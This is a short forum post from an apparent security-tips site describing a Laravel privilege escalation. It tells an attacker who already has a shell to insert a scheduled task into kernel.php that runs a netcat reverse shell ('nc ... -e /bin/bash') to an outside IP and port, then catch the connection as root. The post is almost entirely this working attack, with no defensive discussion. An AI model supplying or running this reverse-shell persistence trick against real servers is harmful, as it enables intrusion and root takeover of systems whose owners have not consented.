Remember
Register
Techbypass Let's Bypass
Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.
Learn and share your security findings and help others to secure their digital assets.
Questions
Unanswered
Tags
Users
Ask a Question
Need any help mail to
[email protected]
Activate
Laravel Privilege Escalation through kernel.php
0
votes
Use your shell to edit kernel.php
protected function schedule(Schedule $schedule)
{
$schedule->exec("nc 10.10.0.4 1337 -e /bin/bash");
}
Now execute the shell several times. Now back connect with 1337 port and check the id.
It will show root.
local-privilege-escalation
asked
Sep 5, 2021
by
exploitNeed
(
109
points)
Please
log in
or
register
to answer this question.
0
Answers
...